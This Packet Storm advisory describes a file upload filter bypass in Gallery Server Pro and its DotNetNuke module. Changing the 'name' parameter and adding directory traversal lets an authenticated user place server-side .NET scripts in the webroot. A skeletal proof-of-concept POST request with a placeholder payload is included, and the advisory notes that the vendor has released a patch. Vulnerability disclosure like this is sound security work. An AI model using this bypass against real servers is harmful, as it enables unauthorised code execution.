Gallery Server Pro File Upload Filter Bypass

Type packetstorm
Reporter Drew Calcott
Modified 2013-05-14T00:00:00


                                            ` ( , ) (,  
. `.' ) ('. ',  
). , ('. ( ) (  
(_,) .`), ) _ _,  
/ _____/ / _ \ ____ ____ _____  
\____ \==/ /_\ \ _/ ___\/ _ \ / \  
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/ .-. \/ \/:wq  
Gallery Server Pro File Upload Filter Bypass  
Vendor Link:  
Gallery Server Pro is a media gallery that works both as a stand-alone  
application and as a module for DotNetNuke. has  
discovered that the upload functionality of both the application and  
DotNetNuke module are vulnerable to bypassing the restrictions present  
in the file upload filter. This permits a malicious authenticated user  
to upload arbitrary file types, including .NET scripts, allowing the  
execution of server side code.  
Exploitation of this vulnerability requires the user to have an  
authenticated account with permission to upload files to a gallery, or  
for the application / module to be configured to allow unauthenticated  
users to upload. By modifying the content of the “name” parameter in the  
POST request to the server, it is possible to bypass the file type  
upload restrictions, which are only applied to the “filename” parameter.  
By then passing directory traversal strings in the “name” parameter, it  
is possible to save the uploaded file within the webroot of the  
application / module.  
In the standalone application version of Gallery Server Pro, the IIS  
user does not have permission to write directly to the webroot of the  
application. Therefore, it is necessary to place the file within the  
“gs\mediaobjects\Samples” path as per the example below. Please note  
that the DotNetNuke module does not have these same restrictions by default.  
|Proof of Concept HTTP POST Request|  
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1  
Host: <vulnerablesite>  
Content-Length: 73459  
Content-Type: multipart/form-data;  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Disposition: form-data; name="name"  
Content-Disposition: form-data; name="file"; filename="malicious.jpg"  
Content-Type: application/octet-stream  
Malicious code here.  
The uploaded file will then be available on the affected server at:  
The vendor has released an update for all vulnerable versions of Gallery  
Server Pro and its related DotNetNuke  
The patch is available for download from the vendor’s website at:  
+-----------------------------+ is Australasia's leading team of Information  
Security consultants specialising in providing high quality Information  
Security services to clients throughout the Asia Pacific region. Our  
clients include some of the largest globally recognised companies in  
areas such as finance, telecommunications, broadcasting, legal and  
government. Our aim is to provide the very best independent advice and a  
high level of technical expertise while creating long and lasting  
professional relationships with our clients.